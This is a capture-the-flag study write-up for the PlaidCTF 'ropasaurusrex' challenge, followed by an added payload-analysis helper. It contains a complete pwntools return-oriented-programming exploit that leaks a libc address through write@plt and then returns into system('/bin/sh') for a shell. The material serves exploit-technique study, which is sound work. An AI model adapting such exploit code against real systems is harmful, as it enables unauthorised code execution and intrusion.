[Original] PWN study notes [Basic ROP exercise] [2013-PlaidCTF-ropasaurusrex]
Posted on: 2022-5-27 16:23
```python
#!/usr/local/bin/python3
from pwn import *
from LibcSearcher import LibcSearcher

# Run the binary under gdb with a breakpoint at 0x804841D
sh = gdb.debug('./ropasaurusrex-85a84f36f81e11f720b1cf5ea0d1fb0d5a603c0d', "b *0x804841D")
elf = ELF('./ropasaurusrex-85a84f36f81e11f720b1cf5ea0d1fb0d5a603c0d')

write_plt = elf.plt['write']
read_got = elf.got['read']
sub_80483F4 = 0x80483F4          # the vulnerable function, re-entered after the leak

# Stage 1: overflow the 136-byte buffer, call write(1, got['read'], 4), then return into sub_80483F4
payload = flat([
    b'A' * 136,        # fill the buffer up to the saved ebp
    0xdeadbeef,        # saved ebp
    write_plt,         # return address -> write@plt
    sub_80483F4,       # where write returns to
    1, read_got, 4,    # write's arguments
    b'B' * 96          # pad to the 0x100 bytes that read() accepts
])
sh.send(payload)

print("get the read addr")
libc_read_addr = u32(sh.recv()[0:4])
libc = LibcSearcher('read', libc_read_addr)
libcbase = libc_read_addr - libc.dump('read')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')

# Stage 2: overflow again and return into system("/bin/sh")
print("get shell")
payload = flat([
    b'C' * 136,
    0xdeadbeef,        # saved ebp
    system_addr,       # return address -> system
    0xdeadbeef,        # return address after system (unused)
    binsh_addr,        # system's argument
    b'D' * 104         # pad to 0x100 bytes
])
sh.send(payload)
sh.interactive()
```
Leak the address of read with write(1, got['read'], 4)
Use LibcSearcher to identify the libc version and compute the addresses of system and str_bin_sh
Call sub_80483F4 again and overflow so that it returns into system("/bin/sh")
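To see how a 0x100-byte input maps onto the frame that sub_80483F4 overflows, here is an added analysis helper (not part of the write-up, and independent of pwntools) that splits a captured input into the buffer fill, the saved-ebp slot and the 32-bit words that land at the return address, and reads those words as one x86 cdecl call frame (callee, address the callee returns to, arguments). The frame geometry (136 bytes to the saved ebp, a 0x100-byte read) and the value 0x80483F4 come from the write-up; the sample input is constructed in the same layout as the first payload, and its write@plt and read@got values are placeholders, not addresses from the binary.

```python
import struct

# Frame geometry stated in the write-up: the overflowed buffer sits 136 bytes
# below the saved ebp, and the vulnerable function reads up to 0x100 bytes.
BUF_SIZE = 136
READ_SIZE = 0x100


def split_frame(payload, buf_size=BUF_SIZE):
    """Split an overflowing input into the stack slots it overwrites.

    Returns the buffer fill, the value that lands in the saved-ebp slot, and
    the 32-bit little-endian words that land at the return address and above
    it (a trailing partial word is ignored).
    """
    if len(payload) < buf_size + 8:
        raise ValueError("input does not reach the return address")
    fill = payload[:buf_size]
    saved_ebp = struct.unpack("<I", payload[buf_size:buf_size + 4])[0]
    rest = payload[buf_size + 4:]
    words = [struct.unpack("<I", rest[i:i + 4])[0]
             for i in range(0, len(rest) - len(rest) % 4, 4)]
    return {"fill": fill, "saved_ebp": saved_ebp, "words": words}


def describe_cdecl_call(words, nargs):
    """Read the words at the return address as one 32-bit cdecl call frame:
    [callee][address the callee returns to][arg1 .. argN]."""
    if len(words) < 2 + nargs:
        raise ValueError("not enough words for a call with %d arguments" % nargs)
    return {"callee": words[0], "ret_after": words[1], "args": words[2:2 + nargs]}


def fits_read(payload, read_size=READ_SIZE):
    """True if the whole input can arrive in the single read() of read_size bytes."""
    return len(payload) <= read_size


# Constructed sample in the layout of the write-up's first payload. The two
# *_PLACEHOLDER values are made up, not addresses from the binary; only
# 0x80483F4 (the function re-entered after write) comes from the write-up.
WRITE_PLT_PLACEHOLDER = 0x11111111
READ_GOT_PLACEHOLDER = 0x22222222
SUB_80483F4 = 0x80483F4

SAMPLE = (b"A" * BUF_SIZE
          + struct.pack("<IIIIII", 0xDEADBEEF, WRITE_PLT_PLACEHOLDER, SUB_80483F4,
                        1, READ_GOT_PLACEHOLDER, 4)
          + b"B" * 96)


def analyse(payload):
    """Summarise one captured input: the frame split, the call it sets up,
    and whether it fits in the single read that the function performs."""
    frame = split_frame(payload)
    call = describe_cdecl_call(frame["words"], 3)
    return {
        "fits_read": fits_read(payload),
        "saved_ebp": frame["saved_ebp"],
        "callee": call["callee"],
        "ret_after": call["ret_after"],
        "args": call["args"],
        # words beyond the call frame: here the 96 bytes of 'B' padding
        "trailing_words": len(frame["words"]) - 5,
    }


if __name__ == "__main__":
    print(analyse(SAMPLE))
```

The trailing word count makes the write-up's padding arithmetic visible: 136 bytes of fill, six 4-byte slots for the call frame and 96 bytes of padding add up to exactly 0x100, which is why the second payload, with a two-slot shorter chain, pads with 104 bytes instead.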